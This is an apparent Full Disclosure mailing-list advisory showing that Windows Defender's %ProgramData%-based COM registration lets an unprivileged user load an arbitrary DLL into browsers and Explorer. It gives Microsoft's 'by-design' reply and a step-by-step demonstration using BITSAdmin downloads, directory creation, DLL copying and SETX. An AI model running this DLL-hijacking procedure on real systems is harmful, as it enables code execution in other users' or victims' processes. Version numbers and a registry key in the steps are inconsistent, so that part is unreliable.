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Defense in depth -- the Microsoft way (part 64): Windows Defender loads and exeutes arbitrary DLLs

From: "Stefan Kanthak" < stefan.kanthak () nexgo de>

Date: Fri. 27 Mar 2020 05:27:56 +0100

Hi @11,

in September 2017, Microsoft relocated many executable files of Windows Defender from the directory "%ProgramFiles%\Windows Defender\" to "%ProgramData%\Microsoft\Windows Defender\platform\<version>\": see https://support.microsoft.com/en-us/help/4052623/update-for-windows-defender-antimalware-platform

JFTR: if Microsoft were only capable to understand English language and notice the difference between "(program) DATA" and "program files"!

Ever since this braindead move, which also violates their own "Designed for Windows" specification, Microsoft registers the paths of Windows Defender's COM classes using the environment variable %ProgramData%:

[HKEY LOCAL MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}] @="Defender CSP"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}\InprocServer32] @=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\DefenderCSP.dll\"" ~~~~~~ here there be dragons!

"ThreadingModel"="Free"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}] @="Windows Defender IOfficeAntiVirus implementation"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts] @="Scanned Hosting Applications"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\shdocvw] @="IAttachmentExecute"

"Enable"=dword:00000001

[HKEY LOCAL MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\urlmon] @="ActiveX controls"

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"Enable"=dword:00000001
[HKEY LOCAL MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Implemented
Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
[HKEY LOCAL MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\MpOav.dll\""
             ~~~~~~ here there be dragons!
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}]
@="Windows Defender WMI Provider"
[HKEY LOCAL MACHINE\SOFTWARE\Classes\CLSID\{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\ProtectionManagement.dll\""
             ~~~~~~~~ here there be dragons!
"ThreadingModel"="Both"
Of special interest here is the IOfficeAntiVirus implementation,
an interface introduced with Windows 2000 and Internet Explorer 5:
see <https://msdn.microsoft.com/en-us/library/ms537369.aspx>
and <https://msdn.microsoft.com/en-us/library/ff830310.aspx>
This interface is called by the attachment manager, introduced
with Windows XP SP2 and Internet Explorer 6 SP2: see
<a href="https://support.microsoft.com/en-us/help/883260/information-about-the-attachment-manager-in-microsoft-windows">https://support.microsoft.com/en-us/help/883260/information-about-the-attachment-manager-in-microsoft-windows</a>
The attachment manager in turn is called by web browsers, mail/news
clients, instant messengers etc. after they store a downloaded file,
a web page or an attachment, and by file explorer when such a file
(which has the "mark of the web") is to be opened or executed.
"Thanks" to the environment variable specified in the registered path
"%ProgramData%\Microsoft\Windows Defender\platform\<version>\MpOav.dll",
an unprivileged user/attacker can provide an arbitrary DLL which is
then loaded and executed in web browsers, mail/news clients, instant
messengers and file explorer whenever the user stores or opens a
downloaded file, a web page or an attachment.
Demonstration:
On a 32-bit (x86) or 64-bit (x64) installation of Windows 10 with the
anti-malware platform update KB4025623 installed perform the following
11 steps:
0. Log on to an arbitrary (unprivileged) user account and start the
   command processor %COMSPEC% alias %SystemRoot%\System32\CMD.exe.

    Download <<a href="https://skanthak.homepage.t-online.de/download/SENTINEL.EXE">https://skanthak.homepage.t-online.de/download/SENTINEL.EXE</a>>

   and save it in your "Downloads" directory:
   START <a href="https://skanthak.homepage.t-online.de/download/SENTINEL.EXE">https://skanthak.homepage.t-online.de/download/SENTINEL.EXE</a>
   The downloaded file gets the "mark of the web"!
2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.CAB>
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and save it in your "%TEMP%" directory:

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BITSAdmin.exe /TRANSFER sentinel /DOWNLOAD /PRIORITY FOREGROUND
http://skanthak.homepage.t-online.de/download/SENTINEL.CAB
"%TEMP%\SENTINEL.CAB"
   See <<a href="https://skanthak.homepage.t-online.de/sentinel.html">https://skanthak.homepage.t-online.de/sentinel.html</a> and/or
   <a href="https://skanthak.homepage.t-online.de/minesweeper.html">https://skanthak.homepage.t-online.de/minesweeper.html</a> for the
   description/documentation of SENTINEL.DLL
3. Extract SENTINEL.DLL for both architectures/bitnesses (x86: 32-bit;
   x64: 64-bit) into your "%TEMP%" directory:
   EXPAND.exe "%TEMP%\SENTINEL.CAB" /F:* "%TEMP%"
4. Display the registered path of MPOAV.dll:
   REG.exe QUERY "HKEY LOCAL MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-
D90121AE785B}\InprocServer32" /VE
  HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}\InprocServer32
                                      "%ProgramData%\Microsoft\Windows Defender\platform\4.18.2008.6-0\MpOav.dll"
     (Default)
                   REG EXPAND SZ
5. Choose an arbitrary directory where you can create subdirectories,
   for example your user profile "%USERPROFILE%", the root directory
   of your Windows drive "%SystemDrive%", or even a shared directory
   like "%COMPUTERNAME%\PUBLIC", and create the subdirectories
   "Microsoft", "Windows Defender", "Platform" plus "<version>" shown
   in the previous step beyond it:
   MKDIR "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2008.6-0"
6. Copy the SENTINEL.DLL matching the bitness of your system as
   MPOAV.dll into the last directory created in the previous step:
   32-bit (x86)
   COPY "%TEMP%\1386\SENTINEL.DLL" "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
   64-bit (x64)
   COPY "%TEMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
7. Verify that you copied the correct DLL and its proper function:
   "MSIEXEC.exe /Z "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
8. Set the environment variable "ProgramData" to the directory
   choosen in step 5:
   SETX.exe ProgramData %SystemDrive%
9. Start every web browser available with the same bitness as your
   system, then download an arbitrary file and notice the message box
   displayed by the
   "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
   called from the web browser:
   "%ProgramFiles%\Internet Explorer\IExplore.exe" <u>https://skanthak.homepage.t-online.de/download/SENTINEL.EXE</u>
   START <a href="https://skanthak.homepage.t-online.de/download/SENTINEL.DLL">https://skanthak.homepage.t-online.de/download/SENTINEL.DLL</a>
10. Start SENTINEL.EXE downloaded in step 1 (which got the "mark of
```

the web") and notice the message box again, now called from

file explorer:

START "" "%USERPROFILE%\Downloads\SENTINEL.EXE"

Vendor statement:

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The MSRC assigned case 57439 to the above report, and replied with the following statements:

After investigation, our engineers have determine this this behavior is by-design and does not constitute as a vulnerability as reported.

#### OUCH!

I recommend to teach these "engineers" the difference between a pathname registered as "%ProgramData%\...\<filename>.<extension>" and a pathname registered as "C:\ProgramData\...\<filename>.<extension>"!

HINT: the second variant does NOT allow to load and execute an ARBITRARY DLL via an environment variable set by the user!

The observed behaviour is therefore NOT by-design, but due to CARELESS implementation by CLUELESS developers.

For an attacker to do as the report indicates, they would already need to have gained sufficient control over the victim's system to change the ProgramFiles environment variable for the process that is instantiating this COM class. This highlights local code execution.

Additionally, our design to get AV to load in a utility process greatly reduces the attack surface of this scenario.

#### OUCH2!

The attack surface is but provided by Windows Defender: its POOR implementation (see above) allows this attack in the first place. And there is no utility process started here: the attacker controlled DLL is loaded and executed in the processes which want to call AV, instead of the DLL installed with Windows Defender, and prevents exactly the intended call of the AV's utility process and defeats your design!

Utility processes are also more restricted than the browser process generally so this is another win in addition to the process decoupling.

#### OUCH<sup>3</sup>!

There is NO decoupled process involved!

The demonstration runs an arbitrary DLL in the process of any web browser, any mail/news client, any instant messenger and file explorer as well, credentials of the current user, UNRESTRICTED.

As such, we are closing this case.

#### Mitigation:

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Use AppLocker or SAFER alias Software Restriction Policies: see https://skanthak.homepage.t-online.de/SAFER.html

stay tuned, and far away from so-called "security software"

Stefan Kanthak

Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure

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